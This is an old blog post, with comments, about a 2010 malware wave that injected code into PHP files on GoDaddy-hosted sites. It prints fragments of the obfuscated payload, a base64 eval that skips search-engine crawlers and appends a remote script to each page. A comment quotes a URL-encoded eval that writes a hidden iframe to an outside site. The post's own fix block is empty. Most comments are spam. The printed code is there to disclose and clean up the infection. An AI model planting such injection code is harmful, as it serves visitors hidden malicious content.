Web Development

Godaddy PHP sites hacked again

During April-May of this year, some hackers have attacked on godaddy shared hosted site.
But it seems they are back to work now. Because in past 2-3 also some site (mostly wordpress blogs) have been hacked by this hackers.

Many sites histed by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack. But fortunately I have got the solution and have transferred my hosting also.

Actually this is the malware which is automatically edited into .php files. It will pick any files and paste the code into it.

The seems as below: (This is the some part of the code, not full code)

[cc lang=”php”]
eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM
oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm
dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g
YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV
qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC
FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2
MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ….
[/cc]

So this code is behave as below:
It will generate the PHP code as attached below code snippet and eval function will execute that code.

[cc lang=”php”]
]*\>)/si’,gml().”\n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE);
}
else
{
return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
}
}
ob_start(‘mrobh’);
}
}
?>

if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
{       
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      
}      
return $R034AE2AB94F99CC81B389A1822DA3353;     
}    
}    

function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
{     
Header(‘Content-Encoding: none’);     
$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(preg_match(‘/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {       return preg_replace('/(\<\/body[^\>]*\>)/si’,gml().”\n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE);      } else {       return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();      }     }     //ob_start(‘mrobh’);   
}
 }
?>
[/cc]

Now, may be other php sites hosted on server other than GoDaddy should have check for this malware for their site.

If you get infected with this malware then run the script from this post and your site will be cured in a moment.

You can also use the same script to verify if your site was infected. If you get a message.

[cc lang=”php”]0 Infected Files ./[/cc]

..Then your site is clean but if you get the list of infected files, then click on “Fix files” and within a few seconds your site gets clean from this malware.

Thanks blog tips for this trick.

The another solution if, which I have just made and its working for me and some other sites.

Create one file which gets included in your script as the first files. Be sure that on other code isplaced before this file inclusion.

In this file write below code:

[cc lang=”php”]
[/cc]

Save this file and upload to your server. This will prevent the malware code to get executed, You can check the very first condition of that code.

Best of luck….

Shares:
  • Raj
    Raj
    September 19, 2010 at 3:59 am

    Today again thousands of websites got infected, godaddy is not even answering the phone…

    for me this fix worked…
    http://alltips.in/how-to-fix-godaddy-malware-attack.html

    thanks..

    Reply
  • attorney
    attorney
    September 19, 2010 at 6:58 am

    Thanks dude. That is fun knowing.

    Reply
  • Sacramento
    Sacramento
    September 19, 2010 at 6:30 pm

    Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up

    Reply
  • Closeout
    Closeout
    September 20, 2010 at 2:02 am

    I’m doing some research in this field and your post has helped a lot, thank you.

    Reply
  • Todd Redfoot
    Todd Redfoot
    September 20, 2010 at 7:34 am

    The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.

    Go Daddy’s Security Team worked quickly to clean and restore all affected sites. The exploit was caused by mailicious files uploaded via FTP to customer websites.

    As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://gdhelp.godaddy.com/article/6

    As always, Go Daddy’s Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy’s 24/7 Customer Support.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    Reply
    • Avinash
      September 20, 2010 at 10:03 am

      Hi Todd,
      Thanks for the information.
      one more question. One of my blog was hacked and its placing some JS code in php files. Code is looks like below:

      eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
      74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%
      22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%
      6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%
      68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%
      66%72%61%6D%65%3E%27%29’));

      I don’t know how to remove this. This website is not hosted in GoDaddy. but any help from your team would be appreciate.
      Thanks
      Avi

      Reply
  • Cary
    Cary
    September 22, 2010 at 5:52 am

    I desired to thank you for this concerning article .I definitely favorite every little bit of it. I have you bookmarked your web site to see at the modern stuff you put up.

    Reply
  • Darrin Greenwald
    September 24, 2010 at 11:50 am

    I think this post was probably a strong start to a potential series of articles about this topic. Most writers pretend to know what they are preaching about when it comes to this stuff and really, nearly no one actually get it. You seem to know about it however, so I think you ought to take it and run. Thank you!

    Reply
  • lerp life insurance
    September 24, 2010 at 12:41 pm

    I’m very glad that you said this!?!

    Reply
  • weighty
    weighty
    September 27, 2010 at 5:09 am

    gonna send this to my mom

    Reply
  • Jeanette Boutros
    Jeanette Boutros
    September 28, 2010 at 8:29 am

    Thanks for posting this.

    Reply
  • Vivien Buer
    Vivien Buer
    September 29, 2010 at 12:57 am

    Thanks for the info, been looking everywhere for information on this.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *